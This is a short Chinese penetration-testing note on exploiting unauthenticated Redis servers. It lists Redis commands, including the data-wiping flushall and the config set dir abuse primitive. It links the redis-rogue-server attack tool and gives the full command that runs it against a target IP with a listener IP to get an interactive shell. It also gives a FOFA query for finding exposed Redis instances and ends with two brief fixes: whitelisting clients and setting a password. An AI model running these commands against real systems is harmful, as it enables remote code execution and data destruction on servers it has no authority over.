#安装redis
apt-get install redis
#redis链接
redis-cli -h 192.168.4.176 -p 6379
#redis常见命令
（1）查看信息：info
（2）删除所有数据库内容：flushall
（3）刷新数据库：flushdb
（4）看所有键：KEYS *，使用select num可以查看键值数据。
（5）设置变量：set test "whoami"
（6）config set dir dirpath 设置路径等配置
（7）config get dir/dbfilename 获取路径及数据配置信息
（8）save保存
（9）get 变量，查看变量名称

步骤三：可以直接连接执行命令且不需要认证说明存在未授权访问漏洞....下载以下攻击项目....

https://github.com/n0b0dyCN/redis-rogue-server

步骤四：使用工具执行以下命令获取目标的命令执行环境，交互时输入i键会获取Shell环境

python3 redis-rogue-server.py --rhost 192.168.0.154 --lhost 192.168.0.1

fofa: port="6379" && protocol="redis"

修复建议

客户端加入到白名单中

设置密码